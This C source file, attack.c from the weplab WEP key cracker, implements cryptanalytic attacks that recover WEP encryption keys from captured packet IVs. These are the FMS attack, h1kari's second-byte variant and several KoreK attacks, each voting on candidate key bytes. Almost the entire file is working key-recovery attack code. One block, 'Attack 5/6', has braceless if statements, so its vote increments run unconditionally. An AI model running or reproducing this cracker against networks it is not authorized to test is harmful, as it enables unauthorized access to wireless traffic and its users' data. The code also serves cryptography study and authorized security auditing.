/*

	weplab - Wep Key Cracker

	Copyright (C) 2004 Jose Ignacio Sanchez Martin - Topo[LB]

	This program is free software; you can redistribute it and/or modify
	it under the terms of the GNU General Public License as published by
	the Free Software Foundation; either version 2, or (at your option)
	any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software Foundation,
	Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.  

	---------

	attack.c: cryptoanalysis attacks to WEP encryption
*/

#include <pcap.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>


#include "attack.h"

unsigned int weakKeyBranch[NUMBER_ATTACKS][13];
unsigned char defaultAttacks[NUMBER_ATTACKS]={1,1,1,1,0,1};	// Sets whether an specific attack number launched by default (1) or not (0).
int reject[256];

static void SwapByte(unsigned char *a, unsigned char *b){
	unsigned char swapByte;
	swapByte=*a;
	*a=*b;
	*b=swapByte;	
}


inline unsigned char reversekey(u_char out, int B, int j, u_char *S)
{
  register int i;

  for(i = 0; i < N; i++)
    if(S[i] == out)
    {
//      out = i;
//      break;
	  return((i - j - S[B + 3]) % N);
    } 

  return((out - j - S[B + 3]) % N);
}

unsigned char reversekey2(u_char out, int B, int j, u_char *S)
{
  register int i;

  for(i = 0; i < N; i++)
    if(S[i] == out)
    {
      out = i;
      break;
    } 

  return((out - j - S[B + 3]) % N);
}

// This function initializes global variables needed for different heuristics attacks.
void InitKeyByteSearch(void){
	int i;
	for (i=0; i<256; i++) reject[i]=0;
}

// Insert your custom attack algorithm in this function.
// keyByte: current keybyte being attacked at this moment.
// sKey: previous guessed keybytes on this particual branch.
// S: calculated permutation vector
// actual_iv: positions 0..2 contains the current packet IV
//						positions 2..3 contains the two first bytes of the RC4 encryption stream
// votes[keybyte][candidateKeyValue]: contains the total votes for current keybyte at a particular possible value 0..0xFF
void AttackAndEvaluate(int keyByte, u_char *sKey, unsigned char *K, unsigned char *S, unsigned char *actual_iv, unsigned int votes[17][256], unsigned int totalIvs){
	int i,j;
	u_char E;
	unsigned char foundWeak[NUMBER_ATTACKS];
	
	// Initialization. foundWeak contains boolean values that indicates if the current data packet was suitable for previous attacks
	// Very usefull if you want to know within your attack algorithm if current packet was found weak by previous attacks
	for (i=0; i<NUMBER_ATTACKS; i++) foundWeak[i]=0;

		// ------------------------------------------------------------
		//   Attack 0: classic FMS attack to byte 0 of output stream
    // ------------------------------------------------------------
    // SOURCE: original FMS paper with suggested h1kari 13% optimization.
    for(i = 0, j = 0; i <keyByte+3; i++)
    {
      j = (j + S[i] + K[i % (keyByte + 3)]) % N;
      SwapByte(&S[i], &S[j]);
    }

		if (defaultAttacks[0]){
    	if((S[1] < keyByte + 3 && (S[1] + S[S[1]]) % N == keyByte + 3))
    	{
				foundWeak[0]=1;
				weakKeyBranch[0][keyByte]++;
				E = reversekey(actual_iv[3], keyByte, j, S);
    		if(S[1] == S[S[1]] || S[1] == S[(S[1] + S[S[1]]) % N] || S[S[1]] == S[(S[1] + S[S[1]]) % N]){
    			votes[keyByte][E]+= 13;
	    	}
    		else{
	    		votes[keyByte][E]+= 5; 
  	  	}
		}
		}

		// ------------------------------------------------------------
		//   Attack 1: classic FMS attack to byte 1 of output stream
    // ------------------------------------------------------------
    // SOURCE: h1kari second byte FMS attack implemented by Topo[LB]
    if ( defaultAttacks[1] && !foundWeak[0] ){
    	if (((S[1] < keyByte + 3) && (S[2] < keyByte + 3) && ((S[2]+S[1])%N<keyByte+3) && (S[S[2] + S[S[2]+S[1]]]) % N == keyByte + 3)) 
    	{
				foundWeak[1]=1;
				weakKeyBranch[1][keyByte]++;
				E = reversekey2(actual_iv[4], keyByte, j, S);

    		if((S[2]+S[1])%N == (S[S[2] + S[S[2]+S[1]]]) % N){
    			votes[keyByte][E]+= 13;
    		}
    		else
    		{ 
    			votes[keyByte][E]+= 2; 
    		}
    	}
	}

		// ------------------------------------------------------------
		//   Attack 3: enhaced 13% FMS
    // ------------------------------------------------------------
    // SOURCE: Korek suggested 13% FMS attack
    if (defaultAttacks[2] ){
			if( S[1] == keyByte + 3 && actual_iv[3] == keyByte + 3 )
    	{
				foundWeak[2]=1;
				weakKeyBranch[2][keyByte]++;
        for( i = 0; S[i] != 0; i++ );
        votes[keyByte][(i - j - S[keyByte+3]) & 0xFF] += 13;

    	}
	}


		// ------------------------------------------------------------
		//   Attack 4: advanced 24% Korek
    // ------------------------------------------------------------
    // SOURCE: Korek advanced 24% suggested attack
    if (defaultAttacks[3] ){
			if( keyByte + 3 > 3 && actual_iv[4] == 0 && S[keyByte+3]==0 && S[2]!=0 )
    	{
				foundWeak[3]=1;
				weakKeyBranch[3][keyByte]++;
        votes[keyByte][(2 - j - S[keyByte+3]) & 0xFF] += 24;
	   	}
	}


		// ------------------------------------------------------------
		//   Attack 5/6: advanced 10% Korek
    // ------------------------------------------------------------
    // SOURCE: Korek advanced 10% suggested attacks
    if (defaultAttacks[4] ){
        if( S[1] > keyByte+3 && ((S[2] + S[1] - keyByte+3) & 0xFF ) == 0 )
        {
            if( actual_iv[4] == S[1] )
            {
                for( i = 0; S[i] != ((S[1] - S[2]) & 0xFF); i++ );

                if( i != 1 && i != 2 )
					foundWeak[4]=1;
					weakKeyBranch[4][keyByte]++;
                    votes[keyByte][(i - j - S[keyByte+3]) & 0xFF] += 10;
            }
            else if( actual_iv[4] == ((2 - S[2]) & 0xFF ) )
            {
                for( i = 0; S[i] != actual_iv[4]; i++ );

                if( i != 1 && i != 2 )
					foundWeak[4]=1;
					weakKeyBranch[4][keyByte]++;
                    votes[keyByte][(i - j - S[keyByte+3]) & 0xFF] += 10;
            }
        }
	}

		// ------------------------------------------------------------
		//   Attack 7: inversed Korek
    // ------------------------------------------------------------
    // SOURCE: Korek advanced 10% suggested attacks
    if (defaultAttacks[5] ){
        if( S[2] == 0 )
        {
            if( S[1] == 2 && actual_iv[3] == 2 )
            {
                reject[(1 - j - S[keyByte+3]) & 0xFF]++;
                reject[(2 - j - S[keyByte+3]) & 0xFF]++;
				foundWeak[5]=1;
				weakKeyBranch[5][keyByte]++;

            }
            else if( actual_iv[4] == 0 )
            {
                reject[(2 - j - S[keyByte+3]) & 0xFF]++;
				foundWeak[5]=1;
				weakKeyBranch[5][keyByte]++;

            }

            if( S[1] == 1 && actual_iv[3] == S[2] )
            {
                reject[(1 - j - S[keyByte+3]) & 0xFF]++;
                reject[(2 - j - S[keyByte+3]) & 0xFF]++;
				foundWeak[5]=1;
				weakKeyBranch[5][keyByte]++;

            }

            if( S[1] == 0 && S[0] == 1 && actual_iv[3] == 1 )
            {
                reject[(0 - j - S[keyByte+3]) & 0xFF]++;
                reject[(1 - j - S[keyByte+3]) & 0xFF]++;
				foundWeak[5]=1;
				weakKeyBranch[5][keyByte]++;

            }    	
        /* reject the "impossible" keybytes */

	    	for( i = 0; i < 256; i++ )
      	  	if( reject[i] >= 2+(int) ( totalIvs / 524288 ) )
       	  	   votes[keyByte][i] = 0xF0000000;	// more than 0xF0000000 will mean impossible and will be replaced by 0 when normalizing
		} 
    }
    


}
